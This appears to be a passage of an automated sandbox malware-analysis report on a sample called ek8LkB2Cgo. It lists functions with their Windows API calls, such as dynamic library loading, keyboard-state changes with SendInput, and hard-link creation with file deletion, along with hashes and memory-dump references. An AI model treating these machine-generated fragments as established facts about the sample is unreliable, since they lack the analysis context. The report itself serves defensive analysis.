                                                                                  • Opcode ID: a778fd8f045cc0806babdbf03fa62b1d0dbc52a99049c2252fabb561e2857bf3
                                                                                  • Instruction ID: 7db7e18d60288ece865d965e24fe79add96c2ebf8a8961a06866cc6d04b52c90
                                                                                  • Opcode Fuzzy Hash: a778fd8f045cc0806babdbf03fa62b1d0dbc52a99049c2252fabb561e2857bf3
                                                                                  • Instruction Fuzzy Hash: CED0A7305047129FC7204F34F8086177BF8BF21715F01441AED95D2250DBB4D8C4DB20
                                                                                  Function 00530564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0053052F,?,005306D7), ref: 00530572
                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00530584
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                  • API String ID: 2574300362-1587604923
                                                                                  • Opcode ID: 5489a1b962bf3b06577267ca876e7987b8684bd591bf6e55f4077f8823a580cc
                                                                                  • Instruction ID: f4b022d4fcb5a56622c742e3a98e7f19408d845f4b1ad1bcb304d246743e3f9d
                                                                                  • Opcode Fuzzy Hash: 5489a1b962bf3b06577267ca876e7987b8684bd591bf6e55f4077f8823a580cc
                                                                                  • Instruction Fuzzy Hash: 0ED052316003229EC7205F28A80AA06BFF8BF15310F50842AE889E2290EAB0C8C4DA20
                                                                                  Function 00530539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,0053051D,?,005305FE), ref: 00530547
                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00530559
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                  • API String ID: 2574300362-1071820185
                                                                                  • Opcode ID: 8a8b1ca1ed18ad8d206b8b99b37ea60585285bb8dba8c83acc3a4b7d996219be
                                                                                  • Instruction ID: f3773ff823047707a81361b75771bb209d2e323b6481a26e150fde18cba8ff46
                                                                                  • Opcode Fuzzy Hash: 8a8b1ca1ed18ad8d206b8b99b37ea60585285bb8dba8c83acc3a4b7d996219be
                                                                                  • Instruction Fuzzy Hash: FFD0A7304007129FC7208F24F80A6057FF4BF11311F50D41DE44AD2190E674C8C4DA20
                                                                                  Function 0054ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0054ECBE,?,0054EBBB), ref: 0054ECD6
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0054ECE8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                  • API String ID: 2574300362-1816364905
                                                                                  • Opcode ID: 0954ee8f80172701f85489d4adb43de6bf15d4a5df1f1e72cf23205a2a1e5ee9
                                                                                  • Instruction ID: 42a238beb0860fb7e81ee1cb4003e16a99016178b03a22dbb2d6f18a94b83c66
                                                                                  • Opcode Fuzzy Hash: 0954ee8f80172701f85489d4adb43de6bf15d4a5df1f1e72cf23205a2a1e5ee9
                                                                                  • Instruction Fuzzy Hash: 14D05E304007239ECB205B64A8896467EF8BF15314B008419A84992191DAB0C8C4EA20
                                                                                  Function 0054BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0054BAD3,00000001,0054B6EE,?,0058DC00), ref: 0054BAEB
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0054BAFD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                  • API String ID: 2574300362-199464113
                                                                                  • Opcode ID: 563a47e7e5f75b24bbc92cd5cff7d04685b4f553957b3095ff4563bc74d90b12
                                                                                  • Instruction ID: a58df38fbdb08b6d40cb88a8d44f174007567ae0358b3fa0ddb2a09c211ce249
                                                                                  • Opcode Fuzzy Hash: 563a47e7e5f75b24bbc92cd5cff7d04685b4f553957b3095ff4563bc74d90b12
                                                                                  • Instruction Fuzzy Hash: 72D09E709007129FD7305F65B849A557AF8BF15755B108419A857A2154D7B0D8C4DA60
                                                                                  Function 00553BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00553BD1,?,00553E06), ref: 00553BE9
                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00553BFB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 2574300362-4033151799
                                                                                  • Opcode ID: cdc762987c4420dfa40a9726bddc84ee33c8f81e9be586c93b1df5bb95c2d984
                                                                                  • Instruction ID: a7b1fb41e764d1f549a45eea8cc23ef4170f379ae0ed95489aa7268bb2ce5afb
                                                                                  • Opcode Fuzzy Hash: cdc762987c4420dfa40a9726bddc84ee33c8f81e9be586c93b1df5bb95c2d984
                                                                                  • Instruction Fuzzy Hash: 04D09E70500752DAD7205FA5B81864ABEB4BF56765B1044AAE859A2150D6B0D888DE60
                                                                                  Function 00529B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c435d255e87ecd3ea32d9602db07130bc45124da01980d00a8f3fcfee33cc0e
                                                                                  • Instruction ID: b2a399d1bf3cd8e9a56d01e1b88ba4a66a07702d81d612f452a9543a0558c439
                                                                                  • Opcode Fuzzy Hash: 7c435d255e87ecd3ea32d9602db07130bc45124da01980d00a8f3fcfee33cc0e
                                                                                  • Instruction Fuzzy Hash: FAC15E75A0022AEFDB14CF94D884AAEBBB5FF49710F114598E905EB391D730DE41DBA0
                                                                                  Function 0054AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0054AAB4
                                                                                  • CoUninitialize.OLE32 ref: 0054AABF
                                                                                    • Part of subcall function 00530213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0053027B
                                                                                  • VariantInit.OLEAUT32(?), ref: 0054AACA
                                                                                  • VariantClear.OLEAUT32(?), ref: 0054AD9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 780911581-0
                                                                                  • Opcode ID: eba9c11c9fc631a0498613d3bed26597876acc7a6e2f634763ae3af8dc151606
                                                                                  • Instruction ID: 964926f8ddcafc32138b82b3e3804cf314937ab8d36387a7195bf9583e9eeec9
                                                                                  • Opcode Fuzzy Hash: eba9c11c9fc631a0498613d3bed26597876acc7a6e2f634763ae3af8dc151606
                                                                                  • Instruction Fuzzy Hash: 1AA157356447019FDB50DF15C485B6ABBE5BF88318F04884DFA9A9B3A2CB34ED44CB86
                                                                                  Function 005291CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                  • String ID:
                                                                                  • API String ID: 2808897238-0
                                                                                  • Opcode ID: 8f04d841ff1a38a4c5f535532a2ae377655b591cfca9123eb8035c7eb6dbb0e2
                                                                                  • Instruction ID: 3993580211ae5124de2d94ec3402677c0dbf4ccf0cb6739b2795c40093af7d26
                                                                                  • Opcode Fuzzy Hash: 8f04d841ff1a38a4c5f535532a2ae377655b591cfca9123eb8035c7eb6dbb0e2
                                                                                  • Instruction Fuzzy Hash: 61518334A003169BDB24EF66E495A2EBBE5FF66314F208C1FE546CB3D1DB7498808715
                                                                                  Function 0051365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 3877424927-0
                                                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                  • Instruction ID: 6773de627c84ef1568470d644c6d20810275e40f71f944b62cba36b4abcccfc9
                                                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                  • Instruction Fuzzy Hash: 165184B4A00306EBFB249F6988A55EE7FA5FF40320F248769F825962D0D7719FD49B40
                                                                                  Function 0055C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(015D70E0,?), ref: 0055C544
                                                                                  • ScreenToClient.USER32(?,00000002), ref: 0055C574
                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0055C5DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                  • String ID:
                                                                                  • API String ID: 3880355969-0
                                                                                  • Opcode ID: 032b94c3dc11694240a47dc2167e9670f01fc524942da287adab9dd9f94233b5
                                                                                  • Instruction ID: 0ec8785ba0a1cf4a7dbc4794b25c84673c6859d26bcb0ee770c40c251e9ac0d8
                                                                                  • Opcode Fuzzy Hash: 032b94c3dc11694240a47dc2167e9670f01fc524942da287adab9dd9f94233b5
                                                                                  • Instruction Fuzzy Hash: 25515C75900205AFCF10DFA8D8A09AE7FB5FF55721F20825AF9159B290E730ED85DB90
                                                                                  Function 0052C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0052C462
                                                                                  • __itow.LIBCMT ref: 0052C49C
                                                                                    • Part of subcall function 0052C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0052C753
                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0052C505
                                                                                  • __itow.LIBCMT ref: 0052C55A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow
                                                                                  • String ID:
                                                                                  • API String ID: 3379773720-0
                                                                                  • Opcode ID: dba6d132685e2ebfe9e0b795040a1d870f03a025fee7f257de08490eac130a95
                                                                                  • Instruction ID: 716e3222184c5b399e9d9184e25bc65d110f86bbeac0be57ad90a59568d09c3a
                                                                                  • Opcode Fuzzy Hash: dba6d132685e2ebfe9e0b795040a1d870f03a025fee7f257de08490eac130a95
                                                                                  • Instruction Fuzzy Hash: 4341D431A0061DAFDF21EF54D846BFE7FB5BF4A704F00001AFA05A3182DB74AA458BA5
                                                                                  Function 0053390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00533966
                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00533982
                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 005339EF
                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00533A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 814f96f70c37910fbc5377846a61f2182d4bdd97cd62eca8440a8583d94aa300
                                                                                  • Instruction ID: 7f6b4a26a9856524a971a6025dc84e3371ae0e810ed4cbdd303297ae55c9672c
                                                                                  • Opcode Fuzzy Hash: 814f96f70c37910fbc5377846a61f2182d4bdd97cd62eca8440a8583d94aa300
                                                                                  • Instruction Fuzzy Hash: 3541F371A04248EEEF208F65C80ABFDBFB9BB95311F04015AF4C5962D1C7B48E89E765
                                                                                  Function 0053E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0053E742
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0053E768
                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0053E78D
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0053E7B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 3321077145-0
                                                                                  • Opcode ID: 950061ab7faabbdeaecd51987f28e1f2bf7d6b9c3ee454d5ad31924dc131c33f
                                                                                  • Instruction ID: 853556f6fcef3424686667f9512bb10c00277b1e6a0dc2aee5a05c4dc589c716
                                                                                  • Opcode Fuzzy Hash: 950061ab7faabbdeaecd51987f28e1f2bf7d6b9c3ee454d5ad31924dc131c33f
                                                                                  • Instruction Fuzzy Hash: F44154396006159FCB11AF15C449A1DBBF5BF99710F098489EA0AAB3A2CB34FC008B95
                                                                                  Function 0055B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0055B5D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: 2a17e46f6205959787299ab2f220d3c2b6b499a43ced9b33cfd349ee29d41174
                                                                                  • Instruction ID: ac00ded08d19bf2cec75f219a626593d62c5c38551c0bd56d1c90138b1f66152
                                                                                  • Opcode Fuzzy Hash: 2a17e46f6205959787299ab2f220d3c2b6b499a43ced9b33cfd349ee29d41174
                                                                                  • Instruction Fuzzy Hash: E431CF74601208AFFF289F18CCADFA87F65BB05312F644503FE11D61E1E730AA88AA55
                                                                                  Function 0055D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 0055D807
                                                                                  • GetWindowRect.USER32(?,?), ref: 0055D87D
                                                                                  • PtInRect.USER32(?,?,0055ED5A), ref: 0055D88D
                                                                                  • MessageBeep.USER32(00000000), ref: 0055D8FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1352109105-0
                                                                                  • Opcode ID: 1fef62ea88baae74839d142aebb17ac9c8d051c958cd8fdf5e493956e62089d5
                                                                                  • Instruction ID: b7da06bae7be064dcc511179df31b885015ddd5d7622a4a8fa10a8aa7084fd09
                                                                                  • Opcode Fuzzy Hash: 1fef62ea88baae74839d142aebb17ac9c8d051c958cd8fdf5e493956e62089d5
                                                                                  • Instruction Fuzzy Hash: DE41A076A00219DFCB21DF58D8A4B69BBF5FF44312F1881A6E8149F261D730E949DB60
                                                                                  Function 00533A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00533AB8
                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00533AD4
                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00533B34
                                                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00533B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
